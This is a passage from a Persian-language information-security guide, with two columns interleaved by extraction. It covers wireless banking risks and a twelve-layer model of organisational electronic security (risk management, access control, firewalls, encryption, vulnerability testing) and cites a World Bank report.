

‫ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺳﺎﺩﻩ ﻣﻴﺎﻥ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻳﻬﺎ‪ ،‬ﺍﻣﻨﻴﺖ ﺭﺍ ﻧﻴـﺰ ﻓـﺮﺍﻫﻢ‬
‫ﻛﻨﺪ‪".‬‬
‫ﻳﻚ ﺭﺍﻩﺣﻞ ﻣﻤﻜﻦ‪ ،‬ﺑﺎﺯﻧﮕﺮﻱ ﺩﺭ ﻣﺪﻝ ﻫﻔﺖﻻﻳـﻪﺍﻱ ﻣﺨـﺎﺑﺮﺍﺕ‬
‫‪ ISO‬ﻭ ﺑﻄﻮﺭ ﺧﺎﺹ ﺍﻳﺠﺎﺩ ﻳـﻚ ﻻﻳـﺔ ﺟﺪﻳـﺪ ‪ -‬ﺑـﺮﺍﻱ ﺗـﺄﻣﻴﻦ‬
‫ﺍﻣﻨﻴﺖ ﻻﺯﻡ ﺑﺮ ﻣﺒﻨﺎﻱ ﻳﻚ ﻛﺪ ‪ ۲۵۶‬ﻳﺎ ﺣﺘـﻲ ‪ ۱۰۲۴‬ﺑﻴﺘـﻲ ﻛـﻪ‬
‫ﻗﺎﺑﻞ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﺎﺷﺪ ‪ -‬ﺍﺳـﺖ‪ .‬ﺍﻳﻨﻜـﻪ ﺭﺍﻩﺣـﻞ ﻧﻬـﺎﻳﻲ ﺑـﺮﺍﻱ‬
‫ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻳﻦ ﻫﺪﻑ ﺍﻳﺠﺎﺩ ﻳﻚ ﻻﻳﺔ ﺟﺪﻳﺪ ﺍﺳﺖ ﻳﺎ ﻣﻲﺗـﻮﺍﻥ‬
‫ﺍﺯ ﻣﻬﻨﺪﺳﻲ ﻣﺠﺪﺩ ﻗﺴﻤﺘﻲ ﺍﺯ ﻻﻳﻪﻫـﺎﻱ ﻓﻌﻠـﻲ ﻧﺘـﺎﻳﺞ ﺑﻬﺘـﺮﻱ‬
‫ﮔﺮﻓﺖ ﻫﻤﭽﻨﺎﻥ ﺑﻪ ﻣﻄﺎﻟﻌـﻪ ﺑﻴـﺸﺘﺮ ﻧﻴـﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺑـﻪ ﻫـﺮ ﺗﺮﺗﻴـﺐ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻲﺳﻴﻢ ﻫﻤﭽﻨﺎﻥ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳﺖ‪.‬‬
‫ﺗﻬﺪﻳــﺪﻫﺎﻳﻲ ﻛــﻪ ﺍﺯ ﺟﺎﻧــﺐ ﭘﺮﻭﺗﻜﻠﻬــﺎﻱ ‪ 802.11‬ﻭ ‪GSM‬‬
‫ﻣﺘﻮﺟﻪ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺟﺎﻣﻌﻴﺖ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﺪﻩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺗﺎ ﺣـﺪ‬
‫ﺯﻳﺎﺩﻱ ﻛﺎﻫﺶ ﺩﺍﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪VPN‬ﻫـﺎ‪ ،‬ﺣﻔﺎﻇـﺖ ﺍﺯ‬
‫‪gateway‬ﻫﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻫﻢ ﺑـﺴﻴﺎﺭ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ‪.‬‬
‫ﺍﻳﻦ ﻧﻜﺘﻪ ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬﺎ ﺑﺴﻴﺎﺭ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﻛﻨﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫‪ VPN‬ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺩﺳﺘﺮﺳﻲ ﻣﺠﺎﺯ‪ ،‬ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﻳﮕـﺮ‬
‫ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺷـﺒﻜﻪ ﺑﻜـﺎﺭ ﮔﻴﺮﻧـﺪ‪ .‬ﺑﺎﻧﻜﻬـﺎ ﻭ‬
‫ﺷﺮﻛﺎﻱ ﻣﺨﺎﺑﺮﺍﺗﻲ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺑـﻪ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺳـﺎﺯ ﻭ ﻛﺎﺭﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ ﺑﺨﺼﻮﺹ ﺩﺭ ﺳﻄﺢ ‪gateway‬ﻫﺎ ﺍﻗﺪﺍﻡ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﻪ ﻣﻮﺍﺯﺍﺕ ﺍﺳﺘﻔﺎﺩﺓ ﺭﻭﺯﺍﻓﺰﻭﻥ ﺗﺠـﺎﺭﺕ ﻭ ﺍﻗﺘـﺼﺎﺩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ‬
‫ﻳﻜﭙﺎﺭﭼﻪ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮ‪ ،‬ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬

‫‪181 Pelton Merge‬‬


‫‪١٩٧‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪:‬‬
‫‪١٨٢‬‬
‫ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻧﻮﻋﻲ ﻓﺮﺁﻳﻨـﺪ ﺩﻭﻭﺟﻬـﻲ‬
‫ﺩﺍﻧﺴﺖ‪ .‬ﺍﻭﻟﻴﻦ ﻣﺮﺣﻠﺔ ﺁﻥ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺍﺳﺖ ﻛﻪ ﺷﺎﻣﻞ ﺳـﻪ‬ ‫ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ‬
‫ﻗﺴﻤﺖ ﻋﻤﺪﻩ ﻣﻲ ﺑﺎﺷﺪ‪ :‬ﺷﻨﺎﺳﺎﺋﻲ ﻭ ﺟﻤﻊﺁﻭﺭﻱ ﺩﺍﺭﺍﺋﻴﻬﺎ‪ ،‬ﺗﺠﺰﻳـﻪ‬
‫ﻭ ﺗﺤﻠﻴﻞ ﻭ ﺗﻌﻴـﻴﻦ ﺍﺭﺯﺵ ﻫﺮﻳـﻚ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬـﺎ‪ ،‬ﻭ ﺗﻌﻴـﻴﻦ ﺍﻳﻨﻜـﻪ‬ ‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪:‬‬
‫ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺑﻪ ﺗﺮﺗﻴﺐ ﺍﻭﻟﻮﻳﺖ ﭼﻘﺪﺭ ﺣﻴﺎﺗﻲ ﻫﺴﺘﻨﺪ‪ .‬ﮔـﺎﻡ‬
‫ﺍﻳﺠﺎﺩ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺖ‬
‫ﺩﻭﻡ ﺍﻣﻨﻴﺖ‪ ،‬ﺗﺪﻭﻳﻦ ﻳﻚ ﺷﻴﻮﻩ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺍﺳـﺖ‪.‬‬
‫ﻗﺴﻤﺘﻬﺎﻱ ﻋﻤﺪﺓ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺗـﺪﻭﻳﻦ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻛﺎﺭﻱ‪ ،‬ﺁﻣﻮﺯﺵ ﻛﺎﺭﺑﺮﺍﻥ )ﺍﻋـﻢ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻭ‬
‫ﻣﺸﺘﺮﻳﺎﻥ( ﻭ ﺑﺎﺯﺑﻴﻨﻲ ﻭ ﻧﻈﺎﺭﺕ ﺑﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﻭ ﻛﻨﺘـﺮﻝ ﻛﻴﻔﻴـﺖ‪.‬‬ ‫ﺗﺎ ﺍﻳﻨﺠـﺎﻱ ﺑﺨـﺶ ﺳـﻮﻡ ﻧﻘـﺶ ﺍﻣﻨﻴـﺖ ﻭ ﻛﺎﺭﻛﺮﺩﻫـﺎﻱ ﺁﻥ ﺩﺭ‬
‫ﻳﻚ ﻧﻈﺮﻳﺔ ﻣﻌﻘﻮﻝ ﺑﻴﺎﻥ ﻣﻲﻛﻨﺪ ﻛﻪ‪" :‬ﺑﭙﺬﻳﺮ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﺍﻋـﻢ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ‪،‬‬
‫ﻫﺪﻑ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻱ؛ ﻭ ﺑﺮﺍﻱ ﻧﺠﺎﺕ ﺧﻮﺩ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻛﻦ"‪.‬‬ ‫ﻣﺆﺳﺴﺎﺕ ﻏﻴﺮ ﺍﻧﺘﻔـﺎﻋﻲ‪ ،‬ﺁﻣﻮﺯﺷـﮕﺎﻫﻬﺎ‪ ،‬ﻭ ﺍﺩﺍﺭﺍﺕ ﺩﻭﻟﺘـﻲ ﻣـﻮﺭﺩ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺖ‪ .‬ﺩﺭ ﺑﺤﺜﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺩﺭ ﺍﻣﻨﻴـﺖ‬


‫ﺳﻪ ﺍﺻﻞ ﻛﻠﻲ ﻛﻪ ﺩﺭ ﺗﺪﻭﻳﻦ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺘـﻲ ﺑﺎﻳـﺪ ﻣـﺪﻧﻈﺮ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺗﺄﻛﻴﺪ ﺷﺪ ﻛﻪ ﻳﻜﻨﻔﺮ ﺑﺎﻳﺪ ﻧﻘﺶ ﺭﻫﺒﺮ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺑﮕﻴﺮﺩ‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺑﻌﺒﺎﺭﺕ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬
‫ﻭﻟﻲ ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﮔﺬﺍﺷﺘﻪ ﻧﺸﺪ ﻛﻪ ﺍﻳـﻦ ﻓـﺮﺩ ﺩﺭ ﻳـﻚ ﺟﺎﻳﮕـﺎﻩ‬
‫ﺣﻤﻼﺕ ﻭ ﺁﺳﻴﺒﻬﺎ ﺍﺟﺘﻨﺎﺏﻧﺎﭘﺬﻳﺮﻧﺪ؛‬ ‫•‬ ‫ﺍﻧﺤﺼﺎﺭﻱ ﺳﺎﺯﻣﺎﻥ ﻣﺜﻞ "ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺖ" ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻓﺮﺁﻳﻨﺪﻱ ﺯﻣﺎﻧﮕﻴﺮ ﺍﺳﺖ؛ ﻭ‬ ‫•‬ ‫)ﺑﻪ ﺍﺳﺘﺜﻨﺎﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺰﺭﮒ(‪ .‬ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ‬
‫ﻳﻚ ﺷﺒﻜﻪ‪ ،‬ﺣﺪﺍﻛﺜﺮ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺿﻌﻴﻔﺘﺮﻳﻦ ﺟﺰﺀ ﺧﻮﺩ‪ ،‬ﺍﻳﻤﻦ‬ ‫•‬ ‫ﻻ ﺍﺯ ﻧﻈﺮ ﺑﻮﺩﺟﻪ ﻭ ﺗﻌﺪﺍﺩ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑـﺎ ﻣﺤـﺪﻭﺩﻳﺖ ﻣﻮﺍﺟـﻪ‬ ‫ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺖ‪.‬‬ ‫ﻫﺴﺘﻴﻢ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﻨﺪﺭﺕ ﺑﺘﻮﺍﻥ ﺍﺯ ﻳﻜﻨﻔﺮ ﺑﻌﻨـﻮﺍﻥ‬
‫ﺑﺮﺍﻱ ﺣﻔﻆ ﺟﺎﻣﻌﻴﺖ ﺩﺍﺩﻩﻫﺎ ﻭ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻂﻫﺎﻱ ﺑـﺎ‬ ‫ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺖ ﻳﺎ ﻛﺎﺭﺷﻨﺎﺱ ﺗﻤﺎﻡ ﻭﻗﺖ ﺍﻣﻨﻴﺘﻲ ﺑﻬﺮﻩ ﮔﺮﻓـﺖ‪.‬‬
‫ﻣﻌﻤﺎﺭﻱ ﺑﺎﺯ‪ ،‬ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ؛‬ ‫ﺑﺎ ﺍﻳﻦ ﻫﻤﻪ‪ ،‬ﻫﺮ ﺷﺮﻛﺘﻲ ﻛﻪ ﺑﻪ ﻧﺤﻮﻱ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﻣـﺮﺗﺒﻂ ﺍﺳـﺖ‬
‫ﻭ ﻃﺒﻖ ﺗﺠﺮﺑﻪ ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺻﺤﻴﺢ ﻫﻴﭽﻴـﻚ‬ ‫ﺑﺎﻳﺪ ﻳﻚ ﻓﺮﺩ ﻳﺎ ﺣـﺪﺍﻛﺜﺮ ﻳـﻚ ﮔـﺮﻭﻩ ﻛﻮﭼـﻚ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ‬
‫ﺍﺯ ﺍﻳﻦ ﻻﻳﻪﻫﺎ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻫﻨﮕﻔﺘﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﺩ‪.‬‬ ‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﻬﺮﻩﮔﻴﺮﻱ ﺍﺯ ﺁﻳـﻴﻦﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﻳﻜﭙﺎﺭﭼﻪ‪ ،‬ﺭﻋﺎﻳـﺖ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻨﺎﺳـﺐ ﺩﺭ ﺗﻬﻴـﺔ ﮔﺰﺍﺭﺷـﻬﺎ‪،‬‬
‫ﻣﺴﺌﻮﻝ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ‪ -‬ﺍﻳﺠﺎﺩ ﺳـﻤﺖ ﻣـﺪﻳﺮﻳﺖ‬ ‫‪.۱‬‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺭﻭﺍﺑﻂ ﻫﻮﺷﻴﺎﺭﺍﻧﻪ ﻭ ﺩﺭ ﻋـﻴﻦ ﺣـﺎﻝ ﺩﻭﺳـﺘﺎﻧﻪ ﺑـﺎ ﺳـﺎﻳﺮ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺍﺯ ﺗﻮﺟﻪ ﺑـﻪ ﻳـﺎﺯﺩﻩ ﻻﻳـﺔ ﺩﻳﮕـﺮ ﺩﺭ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ‪ ،‬ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ﺧﺎﺭﺟﻲ‪ ،‬ﻓﺮﻭﺷﻨﺪﮔﺎﻥ‪ ،‬ﻭ ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﻫﻤﻪ ﻭ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻭ ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ ﺻـﺤﻴﺢ ﺁﻧﻬـﺎ ﻃﺒـﻖ‬
‫‪١٨٣‬‬
‫ﻫﻤﻪ ﻋﻮﺍﻣﻠﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻦ ﮔـﺮﻭﻩ ﻭ ﻳـﺎ ﺷـﺨﺺ‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺯﻳﺮ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺧﺎﺹ ﺩﺭ ﺍﺟﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺳـﺎﺯﻣﺎﻥ ﻛﻤـﻚ ﻧﻤﺎﻳﻨـﺪ‪.‬‬
‫ﺍﻳــﻦ ﻓــﺼﻞ ﭘﻴــﺸﻨﻬﺎﺩﺍﺗﻲ ﻣــﺸﺮﻭﺡ ﺩﺭﺑــﺎﺭﺓ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺍﻣﻨﻴــﺖ‬
‫ﭼﻨﺪﻻﻳﻪ ﻣﻄﺮﺡ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﻳﻚ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺩﻭﺍﺯﺩﻩ ﻻﻳـﻪﺍﻱ‬
‫ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ‪ .‬ﺑﺪﻧﺒﺎﻝ ﺁﻥ‪ ،‬ﻣﻨﺘﺨﺒـﻲ ﺍﺯ ﻓﻬﺮﺳـﺘﻬﺎﻱ ﻛﻨﺘـﺮﻝ‬
‫‪ ۱۸۲‬ﻣﻨﺒﻊ‪:‬‬ ‫ﺍﻣﻨﻴﺘﻲ ﺁﻣﺪﻩ ﻛﻪ ﺑﺎ ﻳﺎﺩﺁﻭﺭﻱ ﻭﻇﺎﻳﻒ ﺭﻭﺯﺍﻧﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﺍﻋـﻀﺎﻱ‬
‫‪Glaessner, Thomas, Kellerman, Tom,‬‬ ‫ﺗﻴﻢ ﻣﺪﻳﺮﻳﺖ ﺩﺭ ﻗﺒﺎﻝ ﺍﻳﻤﻨﻲ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺧﺪﺷﻪﺩﺍﺭ‬
‫‪McNevin, "Electronic Security: Risk Mitigation‬‬
‫‪in Financial Transactions - Public Policy‬‬ ‫ﺷﺪﻥ ﺍﻣﻨﻴﺖ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪Issues", June 2002, The World Bank‬‬
‫‪ ۱۸۳‬ﺑــﺮﺍﻱ ﺟﺰﺋﻴــﺎﺕ ﺑﻴــﺸﺘﺮ ﺑــﻪ ﻛﺘــﺎﺏ ﺯﻳــﺮ ﻧﻮﺷــﺘﺔ ‪،Glaessner‬‬
‫‪ ،Kellerman‬ﻭ ‪ McNevin‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪"Electronics Security: Risk Mitigation in‬‬
‫"‪Financial Transaction‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٩٨‬‬

‫ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ -‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ‬ ‫‪.۸‬‬ ‫ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ‪ -‬ﻳﻚ ﻣﻔﻬﻮﻡ ﻭﺳﻴﻊ ﺑﺮ ﻣﺒﻨـﺎﻱ‬ ‫‪.۲‬‬
‫ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺣﺎﻝ ﺍﻧﺘﻘﺎﻝ ﻭ ﻳـﺎ ﺩﺭ ﻣﻌـﺮﺽ ﺳـﺮﻗﺖ )ﺍﺯ‬ ‫ﺍﻟﮕــﻮﻱ ‪ - OCTAVE‬ﻣﺘﻌﻠــﻖ ﺑــﻪ ‪ - CERT‬ﺑــﺮﺍﻱ‬
‫ﺭﻭﻱ ﺭﺳﺎﻧﺔ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ؛ ﻣﺜ ﹰﻼ ﺭﺳﺎﻧﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻳﺎ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺣﻤﻞ(‬ ‫ﻣﺪﻳﺮﻳﺖ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﻬﺎ‪.‬‬
‫ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ -‬ﺑﺮﺭﺳﻲ‬ ‫‪.۳‬‬
‫ﺁﺯﻣﻮﻥ ﺁﺳـﻴﺐ ﭘـﺬﻳﺮﻱ ‪ -‬ﻣﻨﻈـﻮﺭ ﺍﺯ ﺍﻳـﻦ ﺁﺯﻣـﻮﻥ‪،‬‬ ‫‪.۹‬‬ ‫ﻣﺠﺎﺯ ﺑﻮﺩﻥ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﻛﺎﺭﺑﺮ ﭘﻴﺶ ﺍﺯ ﺍﻋﻄﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ‬
‫ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑﺎﺭﺓ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟـﻮﺩ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺩﺭﺧﻮﺍﺳﺘﻲ‪ .‬ﺩﺭ ﻃﻮﻝ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ‪ ،‬ﻛـﺎﺭﺑﺮ ﻳـﻚ‬
‫ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺒﻜﻪ ﻭ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ ﺟﻬـﺖ‬ ‫ﻧﺎﻡ ﻳﺎ ﺷﻤﺎﺭﻩ ﺣﺴﺎﺏ )ﺩﺍﺩﺓ ﻣﻌﺮﻓﻲ( ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫ﻋﺒﻮﺭ ﺍﺯ ﻣﻮﺍﻧﻊ ﻣﻌﻤﻮﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺩﺳﺘﺮﺳـﻲ‬ ‫)ﺩﺍﺩﺓ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ( ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻣـﻲﻛﻨـﺪ‪ .‬ﻛﻨﺘﺮﻟﻬـﺎﻱ‬
‫ﺑﻪ ﻣﻨﺎﺑﻊ ﻣﺨﺘﻠﻒ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺒﻜﻪ ﺍﺳﺖ‪.‬‬ ‫ﺩﺳﺘﺮﺳﻲ ﺍﻭﻟﻴﻦ ﺧـﻂ ﺗـﺪﺍﻓﻌﻲ ﺑـﻪ ﺣـﺴﺎﺏ ﻣـﻲ ﺁﻳﻨـﺪ ﻭ‬
‫ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺑــﺮ ﺍﺳــﺎﺱ ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ‪ ،‬ﻧــﺸﺎﻧﻬﺎ‪،‬‬
‫‪ .۱۰‬ﺭﺍﻫﺒﺮﻱ ﺻﺤﻴﺢ ﺳﻴﺴﺘﻤﻬﺎ ‪ -‬ﺍﻳـﻦ ﻣـﻮﺭﺩ ﺑﺎﻳـﺪ ﺑـﺎ‬
‫ﻣﺸﺨﺼﻪﻫﺎﻱ ﺯﻳﺴﺘﻲ‪ ،‬ﻭ ﻳـﺎ ﺯﻳﺮﺳـﺎﺧﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ‬
‫ﺗﻬﻴﺔ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺧﻄﺎﻫﺎﻱ ﺭﺍﻳﺞ ﺭﺍﻫﺒﺮﻱ ﻛـﻪ ﻋﻤﻮﻣـﹰﺎ ﺩﺭ‬
‫ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻣﺆﺳﺴﺎﺕ ﻳﺎ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺎﻟﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻭ ﻧﻴﺰ ﻓﻬﺮﺳﺘﻲ‬
‫ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺗﻜﻤﻴﻞ ﮔﺮﺩﺩ‪.‬‬ ‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ‪ -‬ﺍﻳﺠﺎﺩ ﻳﻚ ﺳﻴﺴﺘﻢ ﻭ ﻳﺎ ﺗﺮﻛﻴﺒـﻲ‬ ‫‪.۴‬‬
‫ﺍﺯ ﭼﻨﺪ ﺳﻴﺴﺘﻢ ﻛﻪ ﻣﻴﺎﻥ ﺩﻭ ﻳﺎ ﭼﻨﺪ ﺷﺒﻜﻪ‪ ،‬ﻣﺮﺯ ﻣﺸﺨﺺ‬
‫‪ .۱۱‬ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺪﻳﺮﻳﺖ ﺳﻴﺎﺳﺖ ‪ -‬ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻳـﻚ‬
‫ﻛﻨﺪ‪.‬‬
